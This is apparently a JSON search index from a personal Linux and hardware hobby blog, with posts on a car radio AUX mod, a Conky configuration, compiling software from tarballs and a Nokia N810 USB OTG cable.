And, if your server allows it, you can disconnect sessions and keep them running in the background, even after you log out.\u003c/p\u003e\n\u003cp\u003eYou can install screen on Debian with apt-get by running \u003ccode\u003esudo apt-get install screen\u003c/code\u003e and \u003ccode\u003eyum install screen\u003c/code\u003e for RPM-based systems.\u003c/p\u003e","title":"SSH Tips and Tricks"},{"content":"Here is how I added an AUX input to my Delco Radio/CD player and a nice mount for my N810.\nPart 1 - Adding The AUX Input First off, this worked on my Delco radio. It may work on yours, it may not. On my radio there is a nice AUX button right under the CD button. This goes to an AUX connector on the back of the unit. This is a Delco AUX plug. It was meant to go to a separate tape deck. Unfortunately, this AUX plug requires an intelligent device to be connected in order to function. There is also a device you can buy that will plug into this AUX port and give you a normal RCA connection. However, the goal of this project is to spend as little money as possible while having the fun of doing it yourself.\nWarning If you disconnect your radio from your car battery or any other source of power it may lock itself; this is part of the anti-theft feature. If your radio locks itself there is a link at the bottom with unlocking instructions.\nThe idea is to splice into the CD\u0026rsquo;s input with your own input. Here is the connector and the pins you will need. The ground is in between the Left and Right, but you can use any ground.\nHere is my dash before the mod\nOpening the Radio\nSplicing the needed wires\nI wired my 3.5mm AUX jack in the front of the unit. It barely fit. It would have been a lot easier to run the wires out of the unit and mount it elsewhere in your car. Anyway, the idea is that when you are on the CD input it will use the audio from the CD player unless there is a plug in the AUX jack.
I used Radio Shack part # 274-0246; similar jacks will work, but they may not allow you to switch from CD to AUX. Here is the wiring diagram of the jack.\nPin 1 - Ground - connect to radio ground Pin 2 - Left Channel - wire from CD connector on main circuit board Pin 3 - Left Channel - wire coming from CD player module Pin 4 - Right Channel - wire coming from CD player module Pin 5 - Right Channel - wire from CD connector on main circuit board Here is the jack wired through the front panel\nTesting it with my N810 before I put it all together\nPutting it all back together\nPart 2 - N810 Mount I did not want to spend the money to buy the rest of the mount that the N810 came with, or make anything that was too permanent. So I took the N810 half of the mount (the part the N810 came with) and decided to mount it in the empty slot in my dash. To do that I just screwed the end of it into a 3.5 inch long 2×4, and painted it black to match. Here is the completed mount on its own, and in my dash.\nPart 3 - Finished Here is the final product with the N810 all hooked up\nUpdate I also got an N810 car charger to keep it going, since playing lots of audio can drain the battery, and with Canola I can keep the screen lit so I can always see what is playing.\nUpdate 2 When using the AUX in you need to turn the volume up really high, which means that when you unplug it the CD audio will be extra loud and could hurt your speakers. In addition, since the wires are so close together, some of the CD player\u0026rsquo;s sound signal will bleed into your AUX input due to electromagnetic interference. To fix that I made an audio CD with 80 minutes of silence: I used Audacity to create one long silent audio file, then burned it to a CD. It fixed this problem. 
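The same silent disc can also be produced from the command line instead of Audacity. An audio CD track is just raw 16-bit stereo PCM at 44.1 kHz, and a stream of zero bytes is digital silence, so a sketch like this would work too (the burn command is left commented out, and the /dev/sr0 device name is an assumption — check yours first):

```shell
# 80 min * 60 s * 44100 samples/s * 2 channels * 2 bytes = 846,720,000 bytes.
# bs=176400 is exactly one second of CD audio, so count=4800 gives 80 minutes.
dd if=/dev/zero of=silence.raw bs=176400 count=4800

# Since every sample is zero, byte order does not matter. Burn it as an
# audio track with wodim/cdrecord (device name is an assumption):
# wodim dev=/dev/sr0 -audio silence.raw
```

A nice side effect of all-zero samples is that the usual cdrecord byte-swap concerns for raw audio tracks are irrelevant here.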
I will upload a compressed ISO of this disk soon.\nRelated Links Where I got the mod idea and information from\nDirections to unlock your radio\nMore assorted pinouts\n","permalink":"https://lanrat.com/posts/car-aux-mod/","summary":"\u003cp\u003eHere is how I added an AUX input to my Delco Radio/CD player and a nice mount for my N810.\u003c/p\u003e\n\u003ch1 id=\"part-1---adding-the-aux-input\"\u003ePart 1 - Adding The AUX Input\u003c/h1\u003e\n\u003cp\u003eFirst off, this worked on my Delco radio. It may work on yours, it may not. On my radio there is a nice AUX button right under the CD button. This goes to an AUX connector on the back of the unit. This is a Delco AUX plug. It was meant to go to a separate tape deck. Unfortunately, this AUX plug requires an intelligent device to be connected in order to function. There is also a device you can buy that will plug into this AUX port and give you a normal RCA connection. However, the goal of this project is to spend as little money as possible while having the fun of doing it yourself.\u003c/p\u003e","title":"Car Aux Mod"},{"content":"Conky is a system monitor for Linux. It can tell you almost anything about your computer, such as CPU usage, memory usage, and network information. Here is what my Conky configuration looks like on my desktop.\nTo install Conky on an RPM-based distribution run\nyum install conky Or on a Debian-based distribution run\nsudo apt-get install conky To get yours to look like that you need to put a file named .conkyrc in your home folder. Your home folder is usually /home/$USER.\nThis Conky setup is very dynamic. It will display 1-4 processors or cores, the main root file system, up to 5 removable drives, and all of the active network interfaces (wireless, wired, and wireless broadband). 
If you use a different network configuration, for example two wired connections, you can remove one of the unused ones and replace it with yours, or just add another entry.\nMy .conkyrc file looks like this\n# Conky configuration # Set to yes if you want Conky to be forked in the background background no # Font size? font Sans:size=8 # Use Xft? use_xft yes # Text alpha when using Xft xftalpha 0.9 # Update interval in seconds update_interval 1.0 # This is the number of times Conky will update before quitting. # Set to zero to run forever. total_run_times 0 # Text alignment, other possible values are commented #alignment top_left #alignment top_right #alignment bottom_left alignment bottom_right #alignment none # Create own window instead of using desktop (required in nautilus) own_window yes # If own_window is yes, you may use type normal, desktop or override own_window_type normal # Use pseudo transparency with own_window? own_window_transparent yes # If own_window_transparent is set to no, you can set the background color here own_window_colour black # If own_window is yes, these window manager hints may be used own_window_hints undecorated,below,sticky,skip_taskbar,skip_pager # Use double buffering (reduces flicker, may not work for everyone) double_buffer yes # Minimum size of text area minimum_size 200 5 # Draw shades? draw_shades yes # Draw outlines? draw_outline no # Draw borders around text draw_borders no # Draw borders around graphs draw_graph_borders yes # Default colors and also border colors default_color white default_shade_color black default_outline_color black # Text alignment, other possible values are commented #alignment top_left alignment top_right #alignment bottom_left #alignment bottom_right #alignment none # Gap between borders of screen and text # same thing as passing -x at command line gap_x 12 gap_y 35 # Subtract file system buffers from used memory? 
no_buffers no # set to yes if you want all text to be in uppercase uppercase no # number of cpu samples to average # set to 1 to disable averaging cpu_avg_samples 1 # number of net samples to average # set to 1 to disable averaging net_avg_samples 1 # Force UTF8? note that UTF8 support required XFT override_utf8_locale no TEXT ${color white}SYSTEM: $nodename $machine ${hr 1}${color} Uptime: $alignr$uptime CPU: ${alignr}${freq_dyn} MHz Processes: ${alignr}$processes ($running_processes running) Load: ${alignr}$loadavg ${if_existing /sys/devices/system/cpu/cpu0}CPU1 ${alignr}${cpu cpu1}% ${cpubar cpu1 4}${endif}${if_existing /sys/devices/system/cpu/cpu1} CPU2 ${alignr}${cpu cpu2}% ${cpubar cpu2 4}${endif}${if_existing /sys/devices/system/cpu/cpu2} CPU3 ${alignr}${cpu cpu3}% ${cpubar cpu3 4}${endif}${if_existing /sys/devices/system/cpu/cpu3} CPU4 ${alignr}${cpu cpu4}% ${cpubar cpu4 4}${endif} ${cpugraph 20} Ram ${alignr}$mem / $memmax ($memperc%) ${membar 4} Swap ${alignr}$swap / $swapmax ($swapperc%) ${swapbar 4} Highest CPU $alignr CPU% MEM% ${top name 1}$alignr${top cpu 1}${top mem 1} ${top name 2}$alignr${top cpu 2}${top mem 2} ${top name 3}$alignr${top cpu 3}${top mem 3} Highest MEM $alignr CPU% MEM% ${top_mem name 1}$alignr${top_mem cpu 1}${top_mem mem 1} ${top_mem name 2}$alignr${top_mem cpu 2}${top_mem mem 2} ${top_mem name 3}$alignr${top_mem cpu 3}${top_mem mem 3} ${color white}FILESYSTEMS ${hr 1}${color} Root ${alignr}${fs_free /} / ${fs_size /} ${fs_bar 4 /}${if_mounted /media/disk} Disk1 ${alignr}${fs_free /media/disk} / ${fs_size /media/disk} ${fs_bar 4 /media/disk}${endif}${if_mounted /media/disk-1} Disk2 ${alignr}${fs_free /media/disk-1} / ${fs_size /media/disk-1} ${fs_bar 4 /media/disk-1}${endif}${if_mounted /media/disk-2} Disk3 ${alignr}${fs_free /media/disk-2} / ${fs_size /media/disk-2} ${fs_bar 4 /media/disk-2}${endif}${if_mounted /media/disk-3} Disk4 ${alignr}${fs_free /media/disk-3} / ${fs_size /media/disk-3} ${fs_bar 4 
/media/disk-3}${endif}${if_mounted /media/disk-4} Disk5 ${alignr}${fs_free /media/disk-4} / ${fs_size /media/disk-4} ${fs_bar 4 /media/disk-4}${endif} ${color white}NETWORK ${hr 1}${color} ${if_existing /sys/class/net/eth0/operstate up}IP (eth0):$alignr${addr eth0} Down: ${downspeed eth0} k/s ${alignr}Up: ${upspeed eth0} k/s ${downspeedgraph eth0 20,90} ${alignr}${upspeedgraph eth0 20,90} Total: ${totaldown eth0} ${alignr}Total: ${totalup eth0} ${endif}${if_existing /sys/class/net/wlan0/operstate up}IP (wlan0):$alignr${addr wlan0} AP: ${wireless_essid wlan0} ${alignr}Bitrate: ${wireless_bitrate wlan0} Down: ${downspeed wlan0} k/s ${alignr}Up: ${upspeed wlan0} k/s ${downspeedgraph wlan0 20,90} ${alignr}${upspeedgraph wlan0 20,90} Total: ${totaldown wlan0} ${alignr}Total: ${totalup wlan0} ${endif}${if_existing /sys/class/net/ppp0/operstate}IP (ppp0):$alignr${addr ppp0} Down: ${downspeed ppp0} k/s ${alignr}Up: ${upspeed ppp0} k/s ${downspeedgraph ppp0 20,90} ${alignr}${upspeedgraph ppp0 20,90} Total: ${totaldown ppp0} ${alignr}Total: ${totalup ppp0}${endif} The Conky homepage\n","permalink":"https://lanrat.com/posts/conky/","summary":"\u003cp\u003eConky is a system monitor for Linux. It can tell you almost anything about your computer, such as CPU usage, memory usage, network information, and almost anything else. 
Here is what my Conky configuration looks like on my desktop.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"conky\" loading=\"lazy\" src=\"/posts/conky/images/conky.webp\"\u003e\u003c/p\u003e\n\u003cp\u003eTo install Conky on a RPM based distribution run\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-shell\" data-lang=\"shell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eyum install conky\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eOr on a Debian based distribution run\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-shell\" data-lang=\"shell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt-get install conky\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eTo get yours to look like that you need to put a file named \u003ccode\u003e.conkyrc\u003c/code\u003e in your home folder. Your home folder is usually \u003ccode\u003e/home/$USER\u003c/code\u003e.\u003c/p\u003e","title":"Conky"},{"content":"From time to time every Linux user will run across a program that does not come in a nice packaged DEB or RPM. Often these come in the form of a tar.gz, tgz, tar.bz, tar, gz, tar.bz2 or tbz2 format. This is how you can make use of them. 
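As a quick preview, the whole flow from tarball to installed program can be sketched as follows (names are placeholders; the demo creates its own tiny source tarball so the extract step can be tried anywhere):

```shell
# Demo setup: create a tiny source tarball to practice on.
mkdir -p example-1.0
echo 'int main(void) { return 0; }' > example-1.0/main.c
tar -czf example-1.0.tar.gz example-1.0/

# Extract the source (pick the tar flags that match your extension).
tar -zxvf example-1.0.tar.gz

# cd into the newly created directory and look around.
cd example-1.0/
ls

# For a real source tree that ships an autotools build, you would then run:
#   ./configure && make && sudo make install
```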
Remember to have a compiler installed and any dependencies for the software you are installing.\nExtract To uncompress your file run the following command that applies to your extension.\ntar -zxvf file.tar.gz tar -zxvf file.tgz tar -jxvf file.tar.bz tar -xvf file.tar gunzip file.gz tar jxf file.tar.bz2 tar jxf file.tbz2 Compile Often software will come with a README or INSTALL file that should give you instructions on how to install it and any required dependencies, as well as how to use it. It will probably say the same thing I have here, or something similar. Once you extract the source, cd into the newly created directory.\nls cd path-to-software/ Now configure and compile the software. The configure script checks your system and sets up the build; neither of these steps requires root.\n./configure make Install Okay, now for the last and simplest step, the install. Run this one as root (or with sudo), since it copies files into system directories.\nmake install Everything should have gone well; enjoy your new software!\n","permalink":"https://lanrat.com/posts/extract-compile-and-install-anything-in-linux/","summary":"\u003cp\u003eFrom time to time every Linux user will run across a program that does not come in a nice packaged DEB or RPM. Often these come in the form of a tar.gz, tgz, tar.bz, tar, gz, tar.bz2 or tbz2 format. This is how you can make use of them. Remember to have a compiler installed and any dependencies for the software you are installing.\u003c/p\u003e\n\u003ch2 id=\"extract\"\u003eExtract\u003c/h2\u003e\n\u003cp\u003eTo uncompress your file run the following command that applies to your extension.\u003c/p\u003e","title":"Extract, Compile, and Install Anything in Linux"},{"content":"The Nokia N810 has an OTG or On-The-Go USB controller, which allows the device to function in both client and host mode. By default it is in client mode, so when you plug it into your computer it acts as a USB storage device. It can be put into host mode either by running a program on the tablet that will put it into host mode or by using the OTG trigger. 
The USB plug on the tablet has 5 pins rather than just the standard 4 USB uses. If the extra pin is grounded it will put the N810 into host mode.\nThe same is true for the N800, but the N800 uses a Mini USB connector. The N810 uses Micro USB.\nThis is what I used to make my adapter:\nUSB extension cable (any cable with a female USB Type-A connector will work)\nMicro USB cable with a male connector\nSolder\nShrink tubing/electrical tape\nCut the two cables and separate the wires\nThis is as simple as connecting the same color wires together: red to red, black to black, green to green, white to white, and finally the shield. I put each individual wire in shrink tubing and then the two wires in a larger piece of shrink tubing. I tried to ground the fifth pin to have it be a true OTG cable, but my soldering iron is too big and the connector is too small (see the out-of-focus picture below). If anyone has any suggestions please let me know in the comments. So for now I am using one of the programs that can put the tablet in host mode for you.\nTesting Time! The tablet can power the attached devices, but doing so will drain your battery faster. I have tested it with USB flash drives, memory card readers, USB hubs, keyboards, and CD-ROM drives. All worked fine with no problems (the CD-ROM drive had to be mounted manually).\n","permalink":"https://lanrat.com/posts/n810-usb-otg-adapter/","summary":"\u003cp\u003eThe Nokia N810 has an OTG or On-The-Go USB controller, which allows the device to function in both client and host mode. By default it is in client mode, so when you plug it into your computer it acts as a USB storage device. It can be put into host mode either by running a program on the tablet that will put it into host mode or by using the OTG trigger. The USB plug on the tablet has 5 pins rather than just the standard 4 USB uses. If the extra pin is grounded it will put the N810 into host mode.\u003c/p\u003e","title":"N810 USB OTG Adapter"}]